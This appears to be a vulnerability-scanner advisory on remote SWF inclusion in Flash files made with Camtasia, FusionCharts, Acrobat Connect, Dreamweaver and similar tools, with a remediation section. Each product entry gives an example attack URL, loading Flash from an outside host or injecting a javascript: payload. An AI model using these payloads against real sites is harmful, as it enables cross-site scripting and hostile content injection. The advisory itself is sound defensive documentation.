Possible remote SWF inclusion

Description

A number of products used to create SWF files (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) were found vulnerable to remote SWF inclusion. This page includes a SWF file that is possibly affected by these vulnerabilities.

  • Adobe Dreamweaver and Contribute
    The "skinName" parameter loads an arbitrary flash file
    http://www.example.com/FLVPlayer_Progressive.swf?skinName=http://rcannings.googlepages.com/DoKnowEvil
  • Adobe Acrobat Connect (including Macromedia Breeze):
    The "baseurl" parameter loads an arbitrary flash file:
    http://www.example.com/main.swf?baseurl=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
  • InfoSoft FusionCharts:
    The "dataURL" parameter loads an arbitrary flash file:
    http://www.example.com/Example.swf?debugMode=1&dataURL=%27%3E%3Cimg+src%3D%22http%3A//rcannings.googlepages.com/DoKnowEvil.swf%3F.jpg%22%3E
  • Techsmith Camtasia:
    The "csPreloader" parameter loads an arbitrary flash file:
    http://www.example.com/Example_controller.swf?csPreloader=http://rcannings.googlepages.com/DoKnowEvil.swf%3f
  • Autodemo:
    The "onend" parameter loads arbitrary URLs including the JavaScript protocol handler:
    http://www.example.com/control.swf?onend=javascript:alert(1)//

Remediation

The product used to create this SWF file (Techsmith Camtasia, InfoSoft FusionCharts, Adobe Acrobat Connect, Macromedia Breeze, Adobe Dreamweaver, Adobe Contribute, Autodemo) should be upgraded to the latest version and the SWF file should be recompiled with the fixed version.

References